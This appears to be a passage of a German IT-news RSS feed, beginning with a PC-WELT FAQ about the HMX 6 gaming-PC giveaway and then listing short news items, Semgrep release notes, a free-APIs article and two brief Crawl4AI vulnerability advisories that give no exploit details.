<p>Die Höllenmaschine ist eines der bekanntesten und aufwendigsten Hardware-Projekte von PC‑WELT. Sie ist ein außergewöhnlicher Gaming-PC, den es so kein zweites Mal auf der Welt gibt. Dabei gilt das Motto „Das Beste ist gerade gut genug”!</p>



<p>Die Höllenmaschine besticht durch ein einzigartiges Design, die neuesten, schnellsten und teuersten Komponenten, die es auf dem Markt gibt, und das anschließende Gewinnspiel – denn wir verlosen dieses Einzelstück an einen glücklichen Gewinner aus der Community.</p>



<p>Den kompletten Entstehungsprozess begleiten wir redaktionell. Von der ersten Idee über die Planung und den Bau bis hin zu Problemen, Rückschlägen und der finalen Enthüllung können Zuschauer verfolgen, wie eine neue Höllenmaschine entsteht.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading">Seit wann gibt es das Höllenmaschinen-Projekt?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Geschichte der Höllenmaschine begann vor 20 Jahren im Jahr 2006, als unser <a href="https://www.pcwelt.de/author/michael_schmelzle" target="_blank" rel="noreferrer noopener">PC-WELT-Redakteur Michael Schmelzle</a> die <a href="https://www.pcwelt.de/article/3139027/vor-20-jahren-die-erste-hoellenmaschine-der-pc-welt-2006.html" target="_blank" rel="noreferrer noopener">erste Höllenmaschine zum Leben erweckte</a>. Seitdem sind mehrere außergewöhnliche High-End-PCs entstanden, die für ihre Zeit besonders leistungsstark, aufwendig konstruiert und teilweise ausgesprochen experimentell waren.</p>



<p>Teilweise haben wir 5 Gaming-Systeme, darunter eine Playstation 5 und eine Xbox Series X, in einem einzigen PC-Gehäuse untergebracht oder unfassbar große Spiele- und Zubehörpakete zum eigentlichen Gaming-PC hinzugepackt. Daraus ergaben sich dann natürlich auch enorm hohe Gewinnspielwerte.</p>



<p>Das <strong>20-jährige Jubiläum feiern wir dieses Jahr mit der HMX 6</strong>, bei der wir etwas bauen, was wir immer schon wollten, bisher aber noch nie umgesetzt hatten!</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading">Was ist die HMX 6?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Anders als ein klassischer Gaming-PC wird die HMX 6 als aufwendig konstruierter Tisch-PC umgesetzt. Die Hardware befindet sich also nicht einfach in einem gewöhnlichen Gehäuse, sondern wird Teil eines speziell entwickelten Schreibtischs mit zahlreichen technischen und optischen Besonderheiten.</p>



<p>Mehr können wir zum aktuellen Zeitpunkt noch nicht verraten. Sobald wir mehr Details enthüllen dürfen, finden Sie die Informationen auch in diesem FAQ.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading">Wofür steht die Abkürzung HMX?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>HMX steht für HöllenMaschine eXtreme. Nach der HM08 (im Jahr 2018) und der HM UVR (9. Generation der Höllenmaschine) musste eine Namensänderung her, die der Extremität der Höllenmaschine gerecht wird. Und so wurde aus Höllenmaschine eXtreme die kurze und griffige Bezeichnung “HMX”.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h3 class="wp-block-heading">Wer steckt hinter der Höllenmaschine?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Höllenmaschine ist ein Projekt von PC-WELT, das vom Redakteur Michael Schmelzle vor über 20 Jahren entwickelt wurde. Und er begleitet auch heute noch sein Baby mit voller Leidenschaft und ist die Konstante im “Team Hölle”, das heute aus ihm und unserem Video-Host Kris Wallburg (seit 2025) besteht. Zu sehen ist das Duo auf unserem PC-WELT-Youtube-Kanal, auf dem die beiden das Höllenmaschienen-Projekt betreuen und umsetzen.</p>



<p>Weil das Projekt aber immer größer wurde, sind mittlerweile noch mehr Leute in dem Projekt involviert. Neben Team Hölle sind das vor allem Christian Seliger, Daniel Geßner, Daniel Behrens, Jérémie Kaiser, Panagiotis Kolokythas, Bastian Wehner, Saskia van der Kraaij und ich, Dennis Steimels.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">6.</span>
<h3 class="wp-block-heading">Welche Hardware steckt in der diesjährigen HMX 6?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die HMX 6 wird mit aktueller High-End-Hardware ausgestattet sein und mehr als genug Leistung für anspruchsvolles Gaming, hohe Auflösungen und moderne Spiele bieten.</p>



<p>Welche Komponenten konkret verbaut werden, verraten wir nach und nach. Einen kleinen Spoiler bekommt ihr, wenn ihr <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">unsere HMX-Seite besucht</a>, da wir hier schon die eine oder andere Hardware vorgestellt haben, die Teil der HMX 6 wird.</p>



<p>Neben den klassischen PC-Komponenten wie Prozessor, Grafikkarte, Arbeitsspeicher, SSDs, Mainboard, Netzteil und Wasserkühlung wird es auch ein umfangreiches Peripherie-Paket geben.</p>



<p>So bleibt die Hardware zunächst noch ein Teil des Geheimnisses – schließlich soll nicht schon vor der Veröffentlichung aller Folgen auf YouTube jedes Detail der HMX 6 bekannt sein.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">7.</span>
<h3 class="wp-block-heading">Wann startet die HMX-6-Videoserie und wie oft kommen neue Folgen?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die HMX-6-Videoserie startet mit einer Folge über die Geschichte der Höllenmaschine und blickt auf die vergangenen 20 Jahre des Projekts zurück. <strong>Voraussichtlicher Start ist der 21. Juli 2026.</strong> Der <a href="https://www.pcwelt.de/article/3179968/hmx-6-trailer.html" target="_blank" rel="noreferrer noopener">Trailer zur HMX 6 ging bereits am 30. Juni 2026 online</a>.</p>



<p>Anschließend begleiten neue Episoden die Planung, die Entwicklung und den Bau der HMX 6. Dabei werden unter anderem das Konzept, die Konstruktion des Tischs, die Hardware, das Design und die größten Herausforderungen thematisiert.</p>



<p>Neue Folgen erscheinen regelmäßig einmal pro Woche auf dem YouTube-Kanal von PC-WELT. Ergänzend gibt es auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube Shorts</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a> weitere Einblicke, kurze Updates und Szenen hinter den Kulissen.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">8.</span>
<h3 class="wp-block-heading">Wie kann ich am HMX-6-Gewinnspiel teilnehmen und wie lange läuft es?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Teilnahme erfolgt über <a href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="noreferrer noopener">unseren Gewinnspiel-Artikel zur HMX 6</a>. Dort können sich Interessierte registrieren und die jeweils angegebenen Teilnahmebedingungen erfüllen. Durch verschiedene Aktivitäten können Sie Ihre Gewinnchance erhöhen, etwa indem Sie uns auf Instagram und YouTube besuchen und unseren Newsletter abonnieren</p>



<p>Das Gewinnspiel läuft bis zum <strong>30. September 2026</strong>. Eine Teilnahme ist kostenlos. Alle Details zu Teilnahmeberechtigung, Datenschutz, Aktionszeitraum und möglichen Zusatzaktionen stehen in den offiziellen Teilnahmebedingungen.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">9.</span>
<h3 class="wp-block-heading">Wie und wann werden die Gewinner benachrichtigt?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die Gewinner werden zeitnah nach Ende des Gewinnspiels per Zufall ermittelt und über die bei der Teilnahme angegebenen Kontaktdaten per E-Mail benachrichtigt.</p>



<p>Die Kontaktaufnahme erfolgt ausschließlich über die offiziellen Kanäle von PC-WELT.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">10.</span>
<h3 class="wp-block-heading">Wie hoch ist der Gesamtwert der HMX 6?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Die HMX 6 besteht nicht nur aus leistungsstarker High-End-Hardware. Auch die speziell entwickelte Tischkonstruktion, individuell angefertigte Bauteile, Custom-Kühlung, Beleuchtung und zahlreiche Sonderanfertigungen fließen in den Gesamtwert ein.</p>



<p>Dadurch liegt der Wert deutlich über dem eines gewöhnlichen Gaming-PCs. Stand jetzt liegen wir definitiv bei über 40.000 Euro und sind auf dem Weg, die teuerste Höllenmaschine jemals zu bauen. Den bisherigen Höchstwert von 43.000 Euro haben wir 2017 mit der <a href="https://www.pcwelt.de/article/1163701/community-gewinnspiel-gaming-spiele-pc-hoellenmaschine-8.html" target="_blank" rel="noreferrer noopener">Höllenmaschine 8</a> aufgestellt.</p>
</div>
</div></div>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unerwartete Abschaltungen und Leistungseinbußen: Microsoft bestätigt Probleme nach Windows 11-Update - CHIP]]></title>
<description><![CDATA[Ein aktuelles Windows-Update macht auf manchen Dell-Rechnern Probleme. Microsoft blockiert die Verteilung deshalb vorerst auf betroffenen Geräten. ANZEIGE. Unabhängig und kostenlos dank Ihres Klicks Die mit einem Symbol gekennzeichneten Links sind ...]]></description>
<link>https://tsecurity.de/de/3673596/it-nachrichten/unerwartete-abschaltungen-und-leistungseinbussen-microsoft-bestaetigt-probleme-nach-windows-11-update-chip/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673596/it-nachrichten/unerwartete-abschaltungen-und-leistungseinbussen-microsoft-bestaetigt-probleme-nach-windows-11-update-chip/</guid>
<pubDate>Thu, 16 Jul 2026 15:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein aktuelles Windows-Update macht auf manchen Dell-Rechnern Probleme. Microsoft blockiert die Verteilung deshalb vorerst auf betroffenen Geräten. ANZEIGE. Unabhängig und kostenlos dank Ihres Klicks Die mit einem Symbol gekennzeichneten Links sind ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Spotify: Einstige Premium-Funktion ist ab jetzt für alle Nutzer kostenlos]]></title>
<description><![CDATA[Spotify schaltet ein bisheriges Premium-Feature für alle Nutzer frei. Ab sofort lassen sich verwaltete Nutzerkonten auch mit einem kostenlosen Basis-Zugang erstellen. Das bringt mehr Sicherheit, hat aber einen Haken.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3673408/it-security-nachrichten/spotify-einstige-premium-funktion-ist-ab-jetzt-fuer-alle-nutzer-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673408/it-security-nachrichten/spotify-einstige-premium-funktion-ist-ab-jetzt-fuer-alle-nutzer-kostenlos/</guid>
<pubDate>Thu, 16 Jul 2026 14:24:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160023.html"><img hspace="5" border="0" align="left" alt="Logo, Spotify, Spotify Logo" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/73947.png"></a>
			<a href="https://winfuture.de/special/spotify/" title="Spotify Special">Spotify</a> schaltet ein bisheriges Premium-Feature für alle Nutzer frei. Ab sofort lassen sich verwaltete Nutzerkonten auch mit einem kostenlosen Basis-Zugang erstellen. Das bringt mehr Sicherheit, hat aber einen Haken.			(<a href="https://winfuture.de/news,160023.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[So schauen Sie die WM-Finalspiele gratis live im TV und Stream]]></title>
<description><![CDATA[Das Finale und das Spiel um Platz drei der Weltmeisterschaft 2026 stehen fest. So schauen Sie die Matches kostenlos live im TV und Stream.]]></description>
<link>https://tsecurity.de/de/3672913/it-nachrichten/so-schauen-sie-die-wm-finalspiele-gratis-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672913/it-nachrichten/so-schauen-sie-die-wm-finalspiele-gratis-live-im-tv-und-stream/</guid>
<pubDate>Thu, 16 Jul 2026 11:18:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Finale und das Spiel um Platz drei der Weltmeisterschaft 2026 stehen fest. So schauen Sie die Matches kostenlos live im TV und Stream.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-26216 | unclecode Crawl4AI up to 0.7.x Docker API Deployment /crawl exec code injection]]></title>
<description><![CDATA[A vulnerability was found in unclecode Crawl4AI up to 0.7.x. It has been rated as critical. Impacted is the function exec of the file /crawl of the component Docker API Deployment. The manipulation leads to code injection.

This vulnerability is traded as CVE-2026-26216. It is possible to initiat...]]></description>
<link>https://tsecurity.de/de/3672824/sicherheitsluecken/cve-2026-26216-unclecode-crawl4ai-up-to-07x-docker-api-deployment-crawl-exec-code-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672824/sicherheitsluecken/cve-2026-26216-unclecode-crawl4ai-up-to-07x-docker-api-deployment-crawl-exec-code-injection/</guid>
<pubDate>Thu, 16 Jul 2026 10:40:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/unclecode:crawl4ai">unclecode Crawl4AI up to 0.7.x</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is the function <code>exec</code> of the file <em>/crawl</em> of the component <em>Docker API Deployment</em>. The manipulation leads to code injection.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-26216">CVE-2026-26216</a>. It is possible to initiate the attack remotely. There is no exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-26217 | unclecode Crawl4AI up to 0.7.x Docker API Deployment /execute_js path traversal (GHSA-vx9w-5cx4-9796)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in unclecode Crawl4AI up to 0.7.x. Affected is an unknown function of the file /execute_js of the component Docker API Deployment. Executing a manipulation can lead to path traversal.

The identification of this vulnerability is CVE-2026-2...]]></description>
<link>https://tsecurity.de/de/3672822/sicherheitsluecken/cve-2026-26217-unclecode-crawl4ai-up-to-07x-docker-api-deployment-executejs-path-traversal-ghsa-vx9w-5cx4-9796/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672822/sicherheitsluecken/cve-2026-26217-unclecode-crawl4ai-up-to-07x-docker-api-deployment-executejs-path-traversal-ghsa-vx9w-5cx4-9796/</guid>
<pubDate>Thu, 16 Jul 2026 10:40:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/unclecode:crawl4ai">unclecode Crawl4AI up to 0.7.x</a>. Affected is an unknown function of the file <em>/execute_js</em> of the component <em>Docker API Deployment</em>. Executing a manipulation can lead to path traversal.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-26217">CVE-2026-26217</a>. The attack may be launched remotely. There is no exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zugreifen: 16 kostenlose E-Books im Amazon-Tagesangebot]]></title>
<description><![CDATA[Heute gibt’s Weihnachts-Romanzen, Mond-Prinzessinnen, uralte Rätsel und finstere Thriller für euch kostenlos. 16 Bücher aus dem Amazon-Katalog könnt ihr euch gratis abholen.]]></description>
<link>https://tsecurity.de/de/3672545/it-nachrichten/zugreifen-16-kostenlose-e-books-im-amazon-tagesangebot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672545/it-nachrichten/zugreifen-16-kostenlose-e-books-im-amazon-tagesangebot/</guid>
<pubDate>Thu, 16 Jul 2026 08:33:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Heute gibt’s Weihnachts-Romanzen, Mond-Prinzessinnen, uralte Rätsel und finstere Thriller für euch kostenlos. 16 Bücher aus dem Amazon-Katalog könnt ihr euch gratis abholen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV: „Silo – Staffel 1“ kostenlos auf Amazon Prime Video]]></title>
<description><![CDATA[Vorletzte Woche ist die dritte Staffel der Apple Original-Serie Silo auf Apple TV angelaufen. Falls ihr kein Apple TV Abonnement allerdings Amazon Prime Video Kunde seid, so habt ihr nun die Möglichkeit, in die Serie hinein zu schnuppern. Ab sofort und zeitlich befristet könnt ihr „Silo – Staffel...]]></description>
<link>https://tsecurity.de/de/3672526/ios-mac-os/apple-tv-silo-staffel-1-kostenlos-auf-amazon-prime-video/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672526/ios-mac-os/apple-tv-silo-staffel-1-kostenlos-auf-amazon-prime-video/</guid>
<pubDate>Thu, 16 Jul 2026 08:25:09 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Vorletzte Woche ist die dritte Staffel der Apple Original-Serie Silo auf Apple TV angelaufen. Falls ihr kein Apple TV Abonnement allerdings Amazon Prime Video Kunde seid, so habt ihr nun die Möglichkeit, in die Serie hinein zu schnuppern. Ab sofort und zeitlich befristet könnt ihr „Silo – Staffel 1“ kostenlos auf Prime Video anschauen. Apple […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Kostenlose APIs, die Sie kennen sollten]]></title>
<description><![CDATA[Über Schnittstellen lassen sich diverse Datenschätze (anderer) heben.Terelyuk | shutterstock.com



Application Programming Interfaces (APIs) wurden ursprünglich als Mechanismus entwickelt, um Computern zu ermöglichen, untereinander zu kommunizieren. Im Laufe der Zeit haben sie sich jedoch zu ein...]]></description>
<link>https://tsecurity.de/de/3672307/it-security-nachrichten/kostenlose-apis-die-sie-kennen-sollten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672307/it-security-nachrichten/kostenlose-apis-die-sie-kennen-sollten/</guid>
<pubDate>Thu, 16 Jul 2026 06:06:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/Terelyuk_shutterstock_2479571595_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Bee Hive 16z9" class="wp-image-4087375" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Über Schnittstellen lassen sich diverse Datenschätze (anderer) heben.</figcaption></figure><p class="imageCredit">Terelyuk | shutterstock.com</p></div>



<p class="wp-block-paragraph">Application Programming Interfaces (<a href="https://www.computerwoche.de/article/2790525/was-sie-ueber-application-programming-interfaces-wissen-muessen.html" target="_blank">APIs</a>) wurden ursprünglich als Mechanismus entwickelt, um Computern zu ermöglichen, untereinander zu kommunizieren. Im Laufe der Zeit haben sie sich jedoch zu einem eigenständigen Ökosystem entwickelt. Inzwischen steht für jeden erdenklichen Entwicklungszweck eine nützliche API bereit. Einige sind lediglich dazu da, mit Softwarelösungen zu interagieren – etwa E-Mail-Clients, Spreadsheets oder KI-Systemen. Andere sind Informationsquelllen, die Karten, Wegbeschreibungen oder anderen Content liefern. Diese APIs ersparen es Entwicklern, <a href="https://www.computerwoche.de/article/3497295/datenbank-how-to-fur-app-entwickler.html" target="_blank">eigene Datenbanken</a> von Grund auf neu aufbauen zu müssen.</p>



<p class="wp-block-paragraph">In diesem Artikel liefern wir Ihnen eine kleine, aber feine Auswahl nutzwertiger, kostenloser APIs.</p>



<h2 class="wp-block-heading"><a href="https://www.pexels.com/api/documentation/" target="_blank" rel="noreferrer noopener">Pexels</a></h2>



<p class="wp-block-paragraph">Ein schönes Bild kann eine Webseite direkt aufwerten. Mit dieser API bekommen Sie Zugang zu einer größten Online-Sammlungen kostenloser Stockfotos und -videos, die Sie für Ihre Apps und Webseiten nutzen können. Der einzige “Haken”: Sie müssen die Copyright-Vermerke korrekt angeben. Ein guter Deal.</p>



<h2 class="wp-block-heading"><a href="https://github.com/HackerNews/API" target="_blank" rel="noreferrer noopener">Hacker News</a></h2>



<p class="wp-block-paragraph">Um sich in Sachen Innovationen auf dem Laufenden zu halten oder einfach um neue Ideen aufzutun, ist Hacker News eine der ersten Adressen. Über die zugehörige API der Webseite können Sie auf die Artikel und Diskussionsforen zugreifen, ohne dazu das Internet zu durchforsten.</p>



<h2 class="wp-block-heading"><a href="https://bund.dev/apis" target="_blank" rel="noreferrer noopener">Regierungs-Repositories</a></h2>



<p class="wp-block-paragraph">Die meisten Städte und Länder bieten eigene, frei zugängliche APIs an, die Zugriff auf die Daten diverse Regierungsinstitutionen bieten. Über das deutsche bundDEV-Portal erhalten Sie unter anderem Zugriff auf die Schnittstellen und öffentlich zugänglichen Daten von:</p>



<ul class="wp-block-list">
<li>der Bundesagentur für Arbeit,</li>



<li>dem Bundestag und Bundesrat,</li>



<li>dem statistischen Bundesamt,</li>



<li>dem deutschen Wetterdienst, oder</li>



<li>der Bundesnetzagentur.</li>
</ul>



<h2 class="wp-block-heading"><a href="https://www.newscatcherapi.com/" target="_blank" rel="noreferrer noopener">Newscatcher</a></h2>



<p class="wp-block-paragraph">Wer News analysieren muss, hat es angesichts des Überangebots mitunter schwer. Dagegen hilft die API von Newscatcher: Ein Enterprise-Tool, um News-Daten anzuzapfen und analysieren. Dazu sammelt die API Nachrichten von weltweit mehr als 120.000 Quellen im Web, reichert sie mit Hilfe von NLP mit Metadaten an und stellt diese in organisierter Form bereit.</p>



<h2 class="wp-block-heading">KI-APIs</h2>



<p class="wp-block-paragraph"><strong>Multimedia</strong></p>



<p class="wp-block-paragraph">Auch diverse Tech-Größen hosten APIs, die Sie bei Tasks im Zusammenhang mit Bildern, Audioaufnahmen und generell Multimedia-Inhalten unterstützen können. Dazu gehören etwa:  </p>



<ul class="wp-block-list">
<li><a href="https://aws.amazon.com/de/rekognition/" target="_blank" rel="noreferrer noopener">Amazon Rekognition</a>,</li>



<li><a href="https://mediacenter.ibm.com/media/IBM+Watson+Visual+Recognition/0_jbsmp6lq" target="_blank" rel="noreferrer noopener">IBM Watson Visual Recognition</a>,</li>



<li><a href="https://cloud.google.com/vision?hl=de" target="_blank" rel="noreferrer noopener">Google Cloud Vision API</a>, und</li>



<li><a href="https://azure.microsoft.com/de-de/products/ai-services/ai-vision" target="_blank" rel="noreferrer noopener">Microsoft Azure AI Vision</a></li>
</ul>



<p class="wp-block-paragraph">Aber auch kleinere Anbieter haben interessante Nischen-API-Angebote in petto. Diese beiden Anbieter verfügen über kostenlos nutzbare Angebote:</p>



<ul class="wp-block-list">
<li><a href="https://www.clarifai.com/" target="_blank" rel="noreferrer noopener">Clarifai</a> ist eine API, um beispielsweise Logos, Kleidung, Personen, Fahrzeuge, Waffen oder Uniformen in Bildern und Videos zu identifizieren.</li>



<li><a href="https://roboflow.com/" target="_blank" rel="noreferrer noopener">Roboflow</a> bietet spezielle Funktionen, um die Sicherheit und Genauigkeit von Fabrikprozessen zu optimieren.</li>
</ul>



<p class="wp-block-paragraph"><strong>KI-gestützte Suchen</strong></p>



<p class="wp-block-paragraph">KI-APIs können zudem die Möglichkeiten von Suchmaschinen erweitern, um auch Antworten zu finden, die nicht von bestimmten Keywords abhängig sind.</p>



<ul class="wp-block-list">
<li><a href="https://www.recombee.com/" target="_blank" rel="noreferrer noopener">Recombee</a> hat beispielsweise eine API entwickelt, die als “Personalisierungs-Engine” bezeichnet wird. Sie kann die Suchfunktionen einer Website erweitern.</li>



<li><a href="https://www.algolia.com/products/ai-recommendations" target="_blank" rel="noreferrer noopener">Algolia</a> bietet eine “Recommendation Engine” an, die auf E-Commerce spezialisiert ist.</li>



<li><a href="https://www.shaped.ai/" target="_blank" rel="noreferrer noopener">Shaped</a> verspricht eine Personalisierung im “TikTok-Stil”, die sich tief in diverse Bereiche Ihrer Website einbetten lässt.</li>
</ul>



<p class="wp-block-paragraph">Weitere APIs, die speziell mit Blick auf KI-Integrationen und Workflow-Automatisierung interessant sind, <a href="https://www.computerwoche.de/article/4004872/die-besten-apis-um-ki-zu-integrieren.html" target="_blank">finden Sie hier</a>. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2256990/13-clever-apis-for-capturing-every-kind-of-data.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen. </strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v1.170.0]]></title>
<description><![CDATA[1.170.0 - 2026-07-15
### Added

Pro C/C++ scans now skip code inside statically-dead preprocessor branches
(for example, #if 0 ... #else ... #endif). Patterns that would otherwise
match against intentionally-disabled code no longer report on it. (cpp-if-zero-filter)
Restored obackward: semgrep-co...]]></description>
<link>https://tsecurity.de/de/3671455/it-security-tools/release-v11700/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671455/it-security-tools/release-v11700/</guid>
<pubDate>Wed, 15 Jul 2026 19:19:12 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/semgrep/semgrep/releases/tag/v1.170.0">1.170.0</a> - 2026-07-15</h2>
<h3>### Added</h3>
<ul>
<li>Pro C/C++ scans now skip code inside statically-dead preprocessor branches<br>
(for example, <code>#if 0 ... #else ... #endif</code>). Patterns that would otherwise<br>
match against intentionally-disabled code no longer report on it. (cpp-if-zero-filter)</li>
<li>Restored obackward: semgrep-core and semgrep-core-proprietary once again print a backtrace when receiving a fatal signal (e.g. SIGSEGV) (obackward)</li>
<li><code>semgrep install-semgrep-pro</code> now sends usage metrics so that<br>
installation errors can be tracked. Metrics can be disabled with<br>
<code>--metrics off</code> or <code>SEMGREP_SEND_METRICS=off</code>. Metrics payloads also<br>
now include the method used to install the Semgrep CLI (pip, homebrew,<br>
docker, or unknown), detected heuristically. See metrics.md for<br>
more details of what exactly is sent. (engine-2858)</li>
</ul>
<h3>### Changed</h3>
<ul>
<li>Increased the timeout for dynamic dependency resolution subprocesses from<br>
600 to 900 seconds, giving large projects more time to resolve dependencies<br>
before timing out. (SC-3699)</li>
<li>Pro C/C++ <code>#if 0</code> filtering now also handles cases where the directive splits a<br>
syntactic unit.  For example, a function signature toggle like <code>#if 0 void foo(int i) { #else void foo(uint32_t i) { #endif</code>. (engine-994)</li>
</ul>
<h3>### Fixed</h3>
<ul>
<li>
<p>Fixed a crash at startup (<code>Fatal error: Failed to allocate signal stack for domain 0</code>) when running Semgrep on systems with musl 1.2.6 (e.g. Alpine 3.24) on<br>
recent Intel CPUs whose kernel-reported minimum signal-stack size exceeds musl's<br>
build-time SIGSTKSZ (notably AMX-capable Xeons). (ENGINE-2863)</p>
</li>
<li>
<p>Dockerfile: Fixed parse errors on <code>RUN</code> instructions that use heredoc syntax<br>
(<code>&lt;&lt;EOF</code>, <code>&lt;&lt;-EOF</code>, quoted delimiters). (LANG-263)</p>
</li>
<li>
<p><code>metavariable-type</code> now supports fully qualified type names in languages<br>
where a qualified name in type position parses as an expression (e.g.<br>
Python's <code>types: [a.b.C]</code>) when the metavariable's type is determined by<br>
type inference, such as Pro engine cross-file type resolution. (LANG-583)</p>
</li>
<li>
<p>Updated the ocaml-tree-sitter-core dependency to the latest <code>main</code>.</p>
<ul>
<li>Fails loudly on a parser/runtime ABI mismatch</li>
<li>Stamps every generated <code>parser.c</code> with the tree-sitter version that produced it.</li>
<li>Changed paths where tree-sitter versions are installed (lang-591)</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[WM 2026: England gegen Argentinien heute kostenlos live im TV und Stream?]]></title>
<description><![CDATA[WM 2026, ausgerechnet die zwei Erzrivalen treffen im Halbfinale aufeinander – nach Falkland und der Hand Gottes! Gibt es England gegen Argentinien gratis live im TV und Stream? Wer folgt Frankreich ins Endspiel?]]></description>
<link>https://tsecurity.de/de/3671450/it-nachrichten/wm-2026-england-gegen-argentinien-heute-kostenlos-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671450/it-nachrichten/wm-2026-england-gegen-argentinien-heute-kostenlos-live-im-tv-und-stream/</guid>
<pubDate>Wed, 15 Jul 2026 19:17:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
